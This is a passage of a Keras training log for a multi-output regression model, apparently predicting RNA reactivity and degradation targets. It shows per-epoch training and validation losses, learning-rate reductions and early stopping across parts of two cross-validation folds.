120/120 - 7s - loss: 4.6363 - output_react_loss: 0.5124 - output_bg_ph_loss: 0.5353 - output_ph_loss: 0.7584 - output_mg_c_loss: 0.5383 - output_c_loss: 0.7059 - val_loss: 4.6217 - val_output_react_loss: 0.5505 - val_output_bg_ph_loss: 0.6460 - val_output_ph_loss: 0.6066 - val_output_mg_c_loss: 0.5480 - val_output_c_loss: 0.5262
Epoch 25/70
120/120 - 7s - loss: 4.4305 - output_react_loss: 0.4869 - output_bg_ph_loss: 0.5133 - output_ph_loss: 0.7272 - output_mg_c_loss: 0.5132 - output_c_loss: 0.6766 - val_loss: 4.6304 - val_output_react_loss: 0.5475 - val_output_bg_ph_loss: 0.6499 - val_output_ph_loss: 0.6096 - val_output_mg_c_loss: 0.5507 - val_output_c_loss: 0.5246
Epoch 26/70
120/120 - 7s - loss: 4.6461 - output_react_loss: 0.5099 - output_bg_ph_loss: 0.5270 - output_ph_loss: 0.7788 - output_mg_c_loss: 0.5405 - output_c_loss: 0.7126 - val_loss: 4.6105 - val_output_react_loss: 0.5441 - val_output_bg_ph_loss: 0.6435 - val_output_ph_loss: 0.6049 - val_output_mg_c_loss: 0.5536 - val_output_c_loss: 0.5232
Epoch 27/70
Epoch 00027: ReduceLROnPlateau reducing learning rate to 0.00010000000474974513.
120/120 - 7s - loss: 4.4508 - output_react_loss: 0.4865 - output_bg_ph_loss: 0.5154 - output_ph_loss: 0.7393 - output_mg_c_loss: 0.5180 - output_c_loss: 0.6718 - val_loss: 4.6236 - val_output_react_loss: 0.5541 - val_output_bg_ph_loss: 0.6424 - val_output_ph_loss: 0.6128 - val_output_mg_c_loss: 0.5445 - val_output_c_loss: 0.5288
Epoch 28/70
120/120 - 7s - loss: 4.3974 - output_react_loss: 0.4782 - output_bg_ph_loss: 0.4922 - output_ph_loss: 0.7485 - output_mg_c_loss: 0.5110 - output_c_loss: 0.6862 - val_loss: 4.5277 - val_output_react_loss: 0.5392 - val_output_bg_ph_loss: 0.6349 - val_output_ph_loss: 0.5967 - val_output_mg_c_loss: 0.5348 - val_output_c_loss: 0.5133
Epoch 29/70
120/120 - 7s - loss: 4.1935 - output_react_loss: 0.4579 - output_bg_ph_loss: 0.4789 - output_ph_loss: 0.7002 - output_mg_c_loss: 0.4823 - output_c_loss: 0.6551 - val_loss: 4.5286 - val_output_react_loss: 0.5375 - val_output_bg_ph_loss: 0.6356 - val_output_ph_loss: 0.5949 - val_output_mg_c_loss: 0.5363 - val_output_c_loss: 0.5150
Epoch 30/70
120/120 - 7s - loss: 4.3716 - output_react_loss: 0.4728 - output_bg_ph_loss: 0.4947 - output_ph_loss: 0.7368 - output_mg_c_loss: 0.5026 - output_c_loss: 0.6945 - val_loss: 4.5206 - val_output_react_loss: 0.5371 - val_output_bg_ph_loss: 0.6341 - val_output_ph_loss: 0.5940 - val_output_mg_c_loss: 0.5356 - val_output_c_loss: 0.5130
Epoch 31/70
120/120 - 7s - loss: 4.2824 - output_react_loss: 0.4612 - output_bg_ph_loss: 0.4877 - output_ph_loss: 0.7328 - output_mg_c_loss: 0.4905 - output_c_loss: 0.6709 - val_loss: 4.5204 - val_output_react_loss: 0.5369 - val_output_bg_ph_loss: 0.6333 - val_output_ph_loss: 0.5948 - val_output_mg_c_loss: 0.5358 - val_output_c_loss: 0.5135
Epoch 32/70
120/120 - 8s - loss: 4.2224 - output_react_loss: 0.4580 - output_bg_ph_loss: 0.4723 - output_ph_loss: 0.7178 - output_mg_c_loss: 0.4889 - output_c_loss: 0.6664 - val_loss: 4.5124 - val_output_react_loss: 0.5360 - val_output_bg_ph_loss: 0.6326 - val_output_ph_loss: 0.5944 - val_output_mg_c_loss: 0.5338 - val_output_c_loss: 0.5131
Epoch 33/70
120/120 - 7s - loss: 4.1067 - output_react_loss: 0.4443 - output_bg_ph_loss: 0.4693 - output_ph_loss: 0.6871 - output_mg_c_loss: 0.4744 - output_c_loss: 0.6434 - val_loss: 4.5215 - val_output_react_loss: 0.5368 - val_output_bg_ph_loss: 0.6340 - val_output_ph_loss: 0.5943 - val_output_mg_c_loss: 0.5360 - val_output_c_loss: 0.5134
Epoch 34/70
120/120 - 7s - loss: 4.3377 - output_react_loss: 0.4678 - output_bg_ph_loss: 0.4812 - output_ph_loss: 0.7438 - output_mg_c_loss: 0.5043 - output_c_loss: 0.6874 - val_loss: 4.5075 - val_output_react_loss: 0.5353 - val_output_bg_ph_loss: 0.6321 - val_output_ph_loss: 0.5934 - val_output_mg_c_loss: 0.5333 - val_output_c_loss: 0.5126
Epoch 35/70
120/120 - 7s - loss: 4.1034 - output_react_loss: 0.4508 - output_bg_ph_loss: 0.4664 - output_ph_loss: 0.6807 - output_mg_c_loss: 0.4690 - output_c_loss: 0.6503 - val_loss: 4.5226 - val_output_react_loss: 0.5381 - val_output_bg_ph_loss: 0.6328 - val_output_ph_loss: 0.5957 - val_output_mg_c_loss: 0.5356 - val_output_c_loss: 0.5138
Epoch 36/70
120/120 - 7s - loss: 4.0701 - output_react_loss: 0.4452 - output_bg_ph_loss: 0.4590 - output_ph_loss: 0.6904 - output_mg_c_loss: 0.4662 - output_c_loss: 0.6389 - val_loss: 4.5138 - val_output_react_loss: 0.5366 - val_output_bg_ph_loss: 0.6316 - val_output_ph_loss: 0.5939 - val_output_mg_c_loss: 0.5347 - val_output_c_loss: 0.5142
Epoch 37/70
120/120 - 7s - loss: 4.2783 - output_react_loss: 0.4575 - output_bg_ph_loss: 0.4774 - output_ph_loss: 0.7434 - output_mg_c_loss: 0.4942 - output_c_loss: 0.6767 - val_loss: 4.5133 - val_output_react_loss: 0.5361 - val_output_bg_ph_loss: 0.6321 - val_output_ph_loss: 0.5935 - val_output_mg_c_loss: 0.5350 - val_output_c_loss: 0.5134
Epoch 38/70
120/120 - 7s - loss: 4.2156 - output_react_loss: 0.4574 - output_bg_ph_loss: 0.4655 - output_ph_loss: 0.7182 - output_mg_c_loss: 0.4864 - output_c_loss: 0.6788 - val_loss: 4.5101 - val_output_react_loss: 0.5351 - val_output_bg_ph_loss: 0.6316 - val_output_ph_loss: 0.5937 - val_output_mg_c_loss: 0.5346 - val_output_c_loss: 0.5137
Epoch 39/70
Epoch 00039: ReduceLROnPlateau reducing learning rate to 1.0000000474974514e-05.
120/120 - 7s - loss: 4.2040 - output_react_loss: 0.4570 - output_bg_ph_loss: 0.4739 - output_ph_loss: 0.7226 - output_mg_c_loss: 0.4780 - output_c_loss: 0.6635 - val_loss: 4.5177 - val_output_react_loss: 0.5363 - val_output_bg_ph_loss: 0.6332 - val_output_ph_loss: 0.5938 - val_output_mg_c_loss: 0.5352 - val_output_c_loss: 0.5148
Epoch 40/70
120/120 - 8s - loss: 4.0879 - output_react_loss: 0.4409 - output_bg_ph_loss: 0.4636 - output_ph_loss: 0.6944 - output_mg_c_loss: 0.4676 - output_c_loss: 0.6492 - val_loss: 4.5065 - val_output_react_loss: 0.5355 - val_output_bg_ph_loss: 0.6315 - val_output_ph_loss: 0.5929 - val_output_mg_c_loss: 0.5332 - val_output_c_loss: 0.5133
Epoch 41/70
120/120 - 7s - loss: 4.1062 - output_react_loss: 0.4419 - output_bg_ph_loss: 0.4591 - output_ph_loss: 0.6918 - output_mg_c_loss: 0.4792 - output_c_loss: 0.6540 - val_loss: 4.5043 - val_output_react_loss: 0.5353 - val_output_bg_ph_loss: 0.6310 - val_output_ph_loss: 0.5925 - val_output_mg_c_loss: 0.5332 - val_output_c_loss: 0.5130
Epoch 42/70
120/120 - 7s - loss: 4.1679 - output_react_loss: 0.4495 - output_bg_ph_loss: 0.4657 - output_ph_loss: 0.7240 - output_mg_c_loss: 0.4719 - output_c_loss: 0.6699 - val_loss: 4.5072 - val_output_react_loss: 0.5356 - val_output_bg_ph_loss: 0.6314 - val_output_ph_loss: 0.5929 - val_output_mg_c_loss: 0.5335 - val_output_c_loss: 0.5132
Epoch 43/70
120/120 - 7s - loss: 4.0446 - output_react_loss: 0.4416 - output_bg_ph_loss: 0.4594 - output_ph_loss: 0.6716 - output_mg_c_loss: 0.4668 - output_c_loss: 0.6375 - val_loss: 4.5044 - val_output_react_loss: 0.5355 - val_output_bg_ph_loss: 0.6309 - val_output_ph_loss: 0.5925 - val_output_mg_c_loss: 0.5328 - val_output_c_loss: 0.5135
Epoch 44/70
120/120 - 7s - loss: 4.1571 - output_react_loss: 0.4519 - output_bg_ph_loss: 0.4633 - output_ph_loss: 0.7157 - output_mg_c_loss: 0.4768 - output_c_loss: 0.6574 - val_loss: 4.5038 - val_output_react_loss: 0.5351 - val_output_bg_ph_loss: 0.6309 - val_output_ph_loss: 0.5927 - val_output_mg_c_loss: 0.5331 - val_output_c_loss: 0.5129
Epoch 45/70
120/120 - 7s - loss: 4.1190 - output_react_loss: 0.4399 - output_bg_ph_loss: 0.4596 - output_ph_loss: 0.7120 - output_mg_c_loss: 0.4726 - output_c_loss: 0.6628 - val_loss: 4.5050 - val_output_react_loss: 0.5356 - val_output_bg_ph_loss: 0.6307 - val_output_ph_loss: 0.5928 - val_output_mg_c_loss: 0.5331 - val_output_c_loss: 0.5133
Epoch 46/70
120/120 - 7s - loss: 4.1904 - output_react_loss: 0.4496 - output_bg_ph_loss: 0.4695 - output_ph_loss: 0.7201 - output_mg_c_loss: 0.4816 - output_c_loss: 0.6688 - val_loss: 4.5056 - val_output_react_loss: 0.5357 - val_output_bg_ph_loss: 0.6312 - val_output_ph_loss: 0.5926 - val_output_mg_c_loss: 0.5332 - val_output_c_loss: 0.5127
Epoch 47/70
120/120 - 7s - loss: 4.2432 - output_react_loss: 0.4606 - output_bg_ph_loss: 0.4745 - output_ph_loss: 0.7277 - output_mg_c_loss: 0.4862 - output_c_loss: 0.6731 - val_loss: 4.5064 - val_output_react_loss: 0.5358 - val_output_bg_ph_loss: 0.6310 - val_output_ph_loss: 0.5928 - val_output_mg_c_loss: 0.5336 - val_output_c_loss: 0.5129
Epoch 48/70
120/120 - 7s - loss: 3.9354 - output_react_loss: 0.4218 - output_bg_ph_loss: 0.4448 - output_ph_loss: 0.6639 - output_mg_c_loss: 0.4552 - output_c_loss: 0.6279 - val_loss: 4.5060 - val_output_react_loss: 0.5354 - val_output_bg_ph_loss: 0.6312 - val_output_ph_loss: 0.5927 - val_output_mg_c_loss: 0.5332 - val_output_c_loss: 0.5136
Epoch 49/70
Epoch 00049: ReduceLROnPlateau reducing learning rate to 1.0000000656873453e-06.
120/120 - 7s - loss: 4.1410 - output_react_loss: 0.4473 - output_bg_ph_loss: 0.4629 - output_ph_loss: 0.7069 - output_mg_c_loss: 0.4758 - output_c_loss: 0.6621 - val_loss: 4.5057 - val_output_react_loss: 0.5359 - val_output_bg_ph_loss: 0.6311 - val_output_ph_loss: 0.5930 - val_output_mg_c_loss: 0.5329 - val_output_c_loss: 0.5130
Epoch 50/70
120/120 - 7s - loss: 4.0535 - output_react_loss: 0.4465 - output_bg_ph_loss: 0.4524 - output_ph_loss: 0.6915 - output_mg_c_loss: 0.4633 - output_c_loss: 0.6376 - val_loss: 4.5066 - val_output_react_loss: 0.5359 - val_output_bg_ph_loss: 0.6312 - val_output_ph_loss: 0.5930 - val_output_mg_c_loss: 0.5331 - val_output_c_loss: 0.5132
Epoch 51/70
120/120 - 7s - loss: 4.1506 - output_react_loss: 0.4464 - output_bg_ph_loss: 0.4638 - output_ph_loss: 0.7097 - output_mg_c_loss: 0.4765 - output_c_loss: 0.6675 - val_loss: 4.5061 - val_output_react_loss: 0.5357 - val_output_bg_ph_loss: 0.6311 - val_output_ph_loss: 0.5930 - val_output_mg_c_loss: 0.5331 - val_output_c_loss: 0.5133
Epoch 52/70
120/120 - 7s - loss: 4.1188 - output_react_loss: 0.4439 - output_bg_ph_loss: 0.4648 - output_ph_loss: 0.6971 - output_mg_c_loss: 0.4718 - output_c_loss: 0.6607 - val_loss: 4.5057 - val_output_react_loss: 0.5356 - val_output_bg_ph_loss: 0.6311 - val_output_ph_loss: 0.5930 - val_output_mg_c_loss: 0.5331 - val_output_c_loss: 0.5132
Epoch 53/70
120/120 - 7s - loss: 4.1722 - output_react_loss: 0.4500 - output_bg_ph_loss: 0.4646 - output_ph_loss: 0.7128 - output_mg_c_loss: 0.4809 - output_c_loss: 0.6685 - val_loss: 4.5053 - val_output_react_loss: 0.5355 - val_output_bg_ph_loss: 0.6310 - val_output_ph_loss: 0.5929 - val_output_mg_c_loss: 0.5331 - val_output_c_loss: 0.5132
Epoch 54/70
Restoring model weights from the end of the best epoch.
Epoch 00054: ReduceLROnPlateau reducing learning rate to 1.0000001111620805e-07.
120/120 - 7s - loss: 4.1012 - output_react_loss: 0.4457 - output_bg_ph_loss: 0.4583 - output_ph_loss: 0.7053 - output_mg_c_loss: 0.4713 - output_c_loss: 0.6452 - val_loss: 4.5060 - val_output_react_loss: 0.5355 - val_output_bg_ph_loss: 0.6311 - val_output_ph_loss: 0.5930 - val_output_mg_c_loss: 0.5333 - val_output_c_loss: 0.5132
Epoch 00054: early stopping
FOLD: 5
Epoch 1/70
120/120 - 9s - loss: 8.9648 - output_react_loss: 0.9398 - output_bg_ph_loss: 1.1487 - output_ph_loss: 1.3266 - output_mg_c_loss: 1.1680 - output_c_loss: 1.1252 - val_loss: 6.6904 - val_output_react_loss: 0.7636 - val_output_bg_ph_loss: 0.9520 - val_output_ph_loss: 0.8665 - val_output_mg_c_loss: 0.8282 - val_output_c_loss: 0.7363
Epoch 2/70
120/120 - 7s - loss: 7.6799 - output_react_loss: 0.8094 - output_bg_ph_loss: 0.9836 - output_ph_loss: 1.1459 - output_mg_c_loss: 0.9768 - output_c_loss: 0.9945 - val_loss: 6.0158 - val_output_react_loss: 0.7012 - val_output_bg_ph_loss: 0.8336 - val_output_ph_loss: 0.7948 - val_output_mg_c_loss: 0.7338 - val_output_c_loss: 0.6837
Epoch 3/70
120/120 - 7s - loss: 7.2897 - output_react_loss: 0.7810 - output_bg_ph_loss: 0.9158 - output_ph_loss: 1.1226 - output_mg_c_loss: 0.9056 - output_c_loss: 0.9623 - val_loss: 5.5349 - val_output_react_loss: 0.6677 - val_output_bg_ph_loss: 0.7701 - val_output_ph_loss: 0.7270 - val_output_mg_c_loss: 0.6577 - val_output_c_loss: 0.6171
Epoch 4/70
120/120 - 7s - loss: 6.7767 - output_react_loss: 0.7432 - output_bg_ph_loss: 0.8430 - output_ph_loss: 1.0224 - output_mg_c_loss: 0.8412 - output_c_loss: 0.8995 - val_loss: 5.2177 - val_output_react_loss: 0.6327 - val_output_bg_ph_loss: 0.7224 - val_output_ph_loss: 0.6922 - val_output_mg_c_loss: 0.6148 - val_output_c_loss: 0.5860
Epoch 5/70
120/120 - 7s - loss: 6.5807 - output_react_loss: 0.7253 - output_bg_ph_loss: 0.8228 - output_ph_loss: 1.0071 - output_mg_c_loss: 0.8073 - output_c_loss: 0.8630 - val_loss: 5.0784 - val_output_react_loss: 0.6096 - val_output_bg_ph_loss: 0.7026 - val_output_ph_loss: 0.6803 - val_output_mg_c_loss: 0.5995 - val_output_c_loss: 0.5747
Epoch 6/70
120/120 - 7s - loss: 6.3022 - output_react_loss: 0.6965 - output_bg_ph_loss: 0.7873 - output_ph_loss: 0.9594 - output_mg_c_loss: 0.7747 - output_c_loss: 0.8259 - val_loss: 4.9445 - val_output_react_loss: 0.5908 - val_output_bg_ph_loss: 0.6836 - val_output_ph_loss: 0.6573 - val_output_mg_c_loss: 0.5859 - val_output_c_loss: 0.5667
Epoch 7/70
120/120 - 8s - loss: 6.1569 - output_react_loss: 0.6795 - output_bg_ph_loss: 0.7661 - output_ph_loss: 0.9470 - output_mg_c_loss: 0.7474 - output_c_loss: 0.8241 - val_loss: 4.9766 - val_output_react_loss: 0.5834 - val_output_bg_ph_loss: 0.7018 - val_output_ph_loss: 0.6614 - val_output_mg_c_loss: 0.5918 - val_output_c_loss: 0.5612
Epoch 8/70
120/120 - 7s - loss: 6.1745 - output_react_loss: 0.6824 - output_bg_ph_loss: 0.7600 - output_ph_loss: 0.9654 - output_mg_c_loss: 0.7405 - output_c_loss: 0.8432 - val_loss: 4.8558 - val_output_react_loss: 0.5759 - val_output_bg_ph_loss: 0.6690 - val_output_ph_loss: 0.6489 - val_output_mg_c_loss: 0.5753 - val_output_c_loss: 0.5665
Epoch 9/70
120/120 - 7s - loss: 5.7238 - output_react_loss: 0.6377 - output_bg_ph_loss: 0.7138 - output_ph_loss: 0.8751 - output_mg_c_loss: 0.6886 - output_c_loss: 0.7685 - val_loss: 4.8555 - val_output_react_loss: 0.5673 - val_output_bg_ph_loss: 0.6788 - val_output_ph_loss: 0.6493 - val_output_mg_c_loss: 0.5792 - val_output_c_loss: 0.5556
Epoch 10/70
120/120 - 7s - loss: 5.7590 - output_react_loss: 0.6336 - output_bg_ph_loss: 0.7089 - output_ph_loss: 0.8894 - output_mg_c_loss: 0.6956 - output_c_loss: 0.7936 - val_loss: 4.7163 - val_output_react_loss: 0.5526 - val_output_bg_ph_loss: 0.6563 - val_output_ph_loss: 0.6365 - val_output_mg_c_loss: 0.5557 - val_output_c_loss: 0.5506
Epoch 11/70
120/120 - 7s - loss: 5.5815 - output_react_loss: 0.6273 - output_bg_ph_loss: 0.6864 - output_ph_loss: 0.8704 - output_mg_c_loss: 0.6616 - output_c_loss: 0.7606 - val_loss: 4.6844 - val_output_react_loss: 0.5585 - val_output_bg_ph_loss: 0.6507 - val_output_ph_loss: 0.6214 - val_output_mg_c_loss: 0.5499 - val_output_c_loss: 0.5449
Epoch 12/70
120/120 - 7s - loss: 5.4826 - output_react_loss: 0.6173 - output_bg_ph_loss: 0.6596 - output_ph_loss: 0.8529 - output_mg_c_loss: 0.6578 - output_c_loss: 0.7603 - val_loss: 4.6554 - val_output_react_loss: 0.5450 - val_output_bg_ph_loss: 0.6512 - val_output_ph_loss: 0.6174 - val_output_mg_c_loss: 0.5547 - val_output_c_loss: 0.5363
Epoch 13/70
120/120 - 7s - loss: 5.3332 - output_react_loss: 0.5912 - output_bg_ph_loss: 0.6540 - output_ph_loss: 0.8383 - output_mg_c_loss: 0.6354 - output_c_loss: 0.7337 - val_loss: 4.6316 - val_output_react_loss: 0.5492 - val_output_bg_ph_loss: 0.6412 - val_output_ph_loss: 0.6162 - val_output_mg_c_loss: 0.5516 - val_output_c_loss: 0.5314
Epoch 14/70
120/120 - 8s - loss: 5.3117 - output_react_loss: 0.5859 - output_bg_ph_loss: 0.6470 - output_ph_loss: 0.8433 - output_mg_c_loss: 0.6317 - output_c_loss: 0.7391 - val_loss: 4.5633 - val_output_react_loss: 0.5350 - val_output_bg_ph_loss: 0.6353 - val_output_ph_loss: 0.6074 - val_output_mg_c_loss: 0.5415 - val_output_c_loss: 0.5322
Epoch 15/70
120/120 - 8s - loss: 5.3218 - output_react_loss: 0.5974 - output_bg_ph_loss: 0.6333 - output_ph_loss: 0.8453 - output_mg_c_loss: 0.6272 - output_c_loss: 0.7607 - val_loss: 4.6204 - val_output_react_loss: 0.5386 - val_output_bg_ph_loss: 0.6468 - val_output_ph_loss: 0.6139 - val_output_mg_c_loss: 0.5522 - val_output_c_loss: 0.5313
Epoch 16/70
120/120 - 7s - loss: 5.2437 - output_react_loss: 0.5836 - output_bg_ph_loss: 0.6251 - output_ph_loss: 0.8358 - output_mg_c_loss: 0.6188 - output_c_loss: 0.7528 - val_loss: 4.5869 - val_output_react_loss: 0.5374 - val_output_bg_ph_loss: 0.6370 - val_output_ph_loss: 0.6171 - val_output_mg_c_loss: 0.5449 - val_output_c_loss: 0.5311
Epoch 17/70
120/120 - 7s - loss: 5.0213 - output_react_loss: 0.5595 - output_bg_ph_loss: 0.5995 - output_ph_loss: 0.8040 - output_mg_c_loss: 0.5927 - output_c_loss: 0.7138 - val_loss: 4.5759 - val_output_react_loss: 0.5357 - val_output_bg_ph_loss: 0.6397 - val_output_ph_loss: 0.6064 - val_output_mg_c_loss: 0.5432 - val_output_c_loss: 0.5324
Epoch 18/70
120/120 - 7s - loss: 4.8916 - output_react_loss: 0.5412 - output_bg_ph_loss: 0.5869 - output_ph_loss: 0.7755 - output_mg_c_loss: 0.5758 - output_c_loss: 0.7082 - val_loss: 4.5692 - val_output_react_loss: 0.5379 - val_output_bg_ph_loss: 0.6415 - val_output_ph_loss: 0.6044 - val_output_mg_c_loss: 0.5391 - val_output_c_loss: 0.5278
Epoch 19/70
Epoch 00019: ReduceLROnPlateau reducing learning rate to 0.00010000000474974513.
120/120 - 7s - loss: 4.8882 - output_react_loss: 0.5382 - output_bg_ph_loss: 0.5824 - output_ph_loss: 0.7907 - output_mg_c_loss: 0.5734 - output_c_loss: 0.7095 - val_loss: 4.5903 - val_output_react_loss: 0.5373 - val_output_bg_ph_loss: 0.6393 - val_output_ph_loss: 0.6124 - val_output_mg_c_loss: 0.5453 - val_output_c_loss: 0.5340
Epoch 20/70
120/120 - 7s - loss: 4.7543 - output_react_loss: 0.5258 - output_bg_ph_loss: 0.5629 - output_ph_loss: 0.7631 - output_mg_c_loss: 0.5556 - output_c_loss: 0.7027 - val_loss: 4.4704 - val_output_react_loss: 0.5217 - val_output_bg_ph_loss: 0.6260 - val_output_ph_loss: 0.5967 - val_output_mg_c_loss: 0.5295 - val_output_c_loss: 0.5194
Epoch 21/70
120/120 - 7s - loss: 4.6307 - output_react_loss: 0.5109 - output_bg_ph_loss: 0.5473 - output_ph_loss: 0.7462 - output_mg_c_loss: 0.5416 - output_c_loss: 0.6850 - val_loss: 4.4541 - val_output_react_loss: 0.5213 - val_output_bg_ph_loss: 0.6222 - val_output_ph_loss: 0.5931 - val_output_mg_c_loss: 0.5274 - val_output_c_loss: 0.5190
Epoch 22/70
120/120 - 7s - loss: 4.7757 - output_react_loss: 0.5252 - output_bg_ph_loss: 0.5555 - output_ph_loss: 0.7932 - output_mg_c_loss: 0.5553 - output_c_loss: 0.7104 - val_loss: 4.4514 - val_output_react_loss: 0.5215 - val_output_bg_ph_loss: 0.6220 - val_output_ph_loss: 0.5926 - val_output_mg_c_loss: 0.5263 - val_output_c_loss: 0.5191
Epoch 23/70
120/120 - 8s - loss: 4.6922 - output_react_loss: 0.5121 - output_bg_ph_loss: 0.5512 - output_ph_loss: 0.7699 - output_mg_c_loss: 0.5475 - output_c_loss: 0.7008 - val_loss: 4.4529 - val_output_react_loss: 0.5212 - val_output_bg_ph_loss: 0.6217 - val_output_ph_loss: 0.5935 - val_output_mg_c_loss: 0.5273 - val_output_c_loss: 0.5190
Epoch 24/70
120/120 - 7s - loss: 4.7715 - output_react_loss: 0.5251 - output_bg_ph_loss: 0.5536 - output_ph_loss: 0.7821 - output_mg_c_loss: 0.5579 - output_c_loss: 0.7160 - val_loss: 4.4516 - val_output_react_loss: 0.5199 - val_output_bg_ph_loss: 0.6236 - val_output_ph_loss: 0.5938 - val_output_mg_c_loss: 0.5260 - val_output_c_loss: 0.5187
Epoch 25/70
120/120 - 7s - loss: 4.4517 - output_react_loss: 0.4876 - output_bg_ph_loss: 0.5274 - output_ph_loss: 0.7290 - output_mg_c_loss: 0.5185 - output_c_loss: 0.6555 - val_loss: 4.4539 - val_output_react_loss: 0.5215 - val_output_bg_ph_loss: 0.6226 - val_output_ph_loss: 0.5915 - val_output_mg_c_loss: 0.5279 - val_output_c_loss: 0.5184
Epoch 26/70
120/120 - 7s - loss: 4.6458 - output_react_loss: 0.5124 - output_bg_ph_loss: 0.5382 - output_ph_loss: 0.7634 - output_mg_c_loss: 0.5398 - output_c_loss: 0.7015 - val_loss: 4.4547 - val_output_react_loss: 0.5210 - val_output_bg_ph_loss: 0.6227 - val_output_ph_loss: 0.5934 - val_output_mg_c_loss: 0.5278 - val_output_c_loss: 0.5182
Epoch 27/70
120/120 - 7s - loss: 4.5106 - output_react_loss: 0.4968 - output_bg_ph_loss: 0.5324 - output_ph_loss: 0.7305 - output_mg_c_loss: 0.5255 - output_c_loss: 0.6708 - val_loss: 4.4500 - val_output_react_loss: 0.5203 - val_output_bg_ph_loss: 0.6214 - val_output_ph_loss: 0.5913 - val_output_mg_c_loss: 0.5281 - val_output_c_loss: 0.5190
Epoch 28/70
120/120 - 7s - loss: 4.6403 - output_react_loss: 0.5107 - output_bg_ph_loss: 0.5368 - output_ph_loss: 0.7640 - output_mg_c_loss: 0.5427 - output_c_loss: 0.6960 - val_loss: 4.4483 - val_output_react_loss: 0.5201 - val_output_bg_ph_loss: 0.6215 - val_output_ph_loss: 0.5918 - val_output_mg_c_loss: 0.5270 - val_output_c_loss: 0.5192
Epoch 29/70
120/120 - 7s - loss: 4.4913 - output_react_loss: 0.4889 - output_bg_ph_loss: 0.5276 - output_ph_loss: 0.7353 - output_mg_c_loss: 0.5262 - output_c_loss: 0.6706 - val_loss: 4.4535 - val_output_react_loss: 0.5199 - val_output_bg_ph_loss: 0.6213 - val_output_ph_loss: 0.5946 - val_output_mg_c_loss: 0.5287 - val_output_c_loss: 0.5192
Epoch 30/70
120/120 - 7s - loss: 4.5325 - output_react_loss: 0.4932 - output_bg_ph_loss: 0.5301 - output_ph_loss: 0.7476 - output_mg_c_loss: 0.5284 - output_c_loss: 0.6813 - val_loss: 4.4534 - val_output_react_loss: 0.5200 - val_output_bg_ph_loss: 0.6227 - val_output_ph_loss: 0.5932 - val_output_mg_c_loss: 0.5280 - val_output_c_loss: 0.5190
Epoch 31/70
120/120 - 7s - loss: 4.6655 - output_react_loss: 0.5160 - output_bg_ph_loss: 0.5454 - output_ph_loss: 0.7764 - output_mg_c_loss: 0.5364 - output_c_loss: 0.6935 - val_loss: 4.4497 - val_output_react_loss: 0.5211 - val_output_bg_ph_loss: 0.6212 - val_output_ph_loss: 0.5921 - val_output_mg_c_loss: 0.5267 - val_output_c_loss: 0.5194
Epoch 32/70
120/120 - 7s - loss: 4.5931 - output_react_loss: 0.4959 - output_bg_ph_loss: 0.5323 - output_ph_loss: 0.7595 - output_mg_c_loss: 0.5395 - output_c_loss: 0.6981 - val_loss: 4.4446 - val_output_react_loss: 0.5206 - val_output_bg_ph_loss: 0.6205 - val_output_ph_loss: 0.5926 - val_output_mg_c_loss: 0.5264 - val_output_c_loss: 0.5169
Epoch 33/70
120/120 - 7s - loss: 4.3964 - output_react_loss: 0.4823 - output_bg_ph_loss: 0.5141 - output_ph_loss: 0.7203 - output_mg_c_loss: 0.5127 - output_c_loss: 0.6580 - val_loss: 4.4553 - val_output_react_loss: 0.5209 - val_output_bg_ph_loss: 0.6214 - val_output_ph_loss: 0.5944 - val_output_mg_c_loss: 0.5288 - val_output_c_loss: 0.5187
Epoch 34/70
120/120 - 7s - loss: 4.4073 - output_react_loss: 0.4855 - output_bg_ph_loss: 0.5156 - output_ph_loss: 0.7207 - output_mg_c_loss: 0.5123 - output_c_loss: 0.6599 - val_loss: 4.4478 - val_output_react_loss: 0.5195 - val_output_bg_ph_loss: 0.6226 - val_output_ph_loss: 0.5909 - val_output_mg_c_loss: 0.5271 - val_output_c_loss: 0.5185
Epoch 35/70
120/120 - 7s - loss: 4.5178 - output_react_loss: 0.4913 - output_bg_ph_loss: 0.5249 - output_ph_loss: 0.7517 - output_mg_c_loss: 0.5276 - output_c_loss: 0.6785 - val_loss: 4.4527 - val_output_react_loss: 0.5213 - val_output_bg_ph_loss: 0.6228 - val_output_ph_loss: 0.5934 - val_output_mg_c_loss: 0.5263 - val_output_c_loss: 0.5185
Epoch 36/70
120/120 - 7s - loss: 4.4502 - output_react_loss: 0.4907 - output_bg_ph_loss: 0.5147 - output_ph_loss: 0.7224 - output_mg_c_loss: 0.5196 - output_c_loss: 0.6778 - val_loss: 4.4616 - val_output_react_loss: 0.5224 - val_output_bg_ph_loss: 0.6234 - val_output_ph_loss: 0.5936 - val_output_mg_c_loss: 0.5286 - val_output_c_loss: 0.5192
Epoch 37/70
120/120 - 7s - loss: 4.5019 - output_react_loss: 0.4848 - output_bg_ph_loss: 0.5232 - output_ph_loss: 0.7487 - output_mg_c_loss: 0.5269 - output_c_loss: 0.6834 - val_loss: 4.4388 - val_output_react_loss: 0.5192 - val_output_bg_ph_loss: 0.6203 - val_output_ph_loss: 0.5906 - val_output_mg_c_loss: 0.5255 - val_output_c_loss: 0.5183
Epoch 38/70
120/120 - 7s - loss: 4.6008 - output_react_loss: 0.4989 - output_bg_ph_loss: 0.5318 - output_ph_loss: 0.7743 - output_mg_c_loss: 0.5331 - output_c_loss: 0.6988 - val_loss: 4.4428 - val_output_react_loss: 0.5200 - val_output_bg_ph_loss: 0.6201 - val_output_ph_loss: 0.5913 - val_output_mg_c_loss: 0.5270 - val_output_c_loss: 0.5173
Epoch 39/70
120/120 - 7s - loss: 4.4832 - output_react_loss: 0.4915 - output_bg_ph_loss: 0.5185 - output_ph_loss: 0.7407 - output_mg_c_loss: 0.5242 - output_c_loss: 0.6742 - val_loss: 4.4557 - val_output_react_loss: 0.5196 - val_output_bg_ph_loss: 0.6228 - val_output_ph_loss: 0.5949 - val_output_mg_c_loss: 0.5282 - val_output_c_loss: 0.5195
Epoch 40/70
120/120 - 7s - loss: 4.3365 - output_react_loss: 0.4731 - output_bg_ph_loss: 0.5059 - output_ph_loss: 0.7114 - output_mg_c_loss: 0.5005 - output_c_loss: 0.6661 - val_loss: 4.4675 - val_output_react_loss: 0.5215 - val_output_bg_ph_loss: 0.6240 - val_output_ph_loss: 0.5943 - val_output_mg_c_loss: 0.5309 - val_output_c_loss: 0.5204
Epoch 41/70
120/120 - 7s - loss: 4.4591 - output_react_loss: 0.4814 - output_bg_ph_loss: 0.5189 - output_ph_loss: 0.7371 - output_mg_c_loss: 0.5184 - output_c_loss: 0.6846 - val_loss: 4.4509 - val_output_react_loss: 0.5202 - val_output_bg_ph_loss: 0.6215 - val_output_ph_loss: 0.5925 - val_output_mg_c_loss: 0.5280 - val_output_c_loss: 0.5189
Epoch 42/70
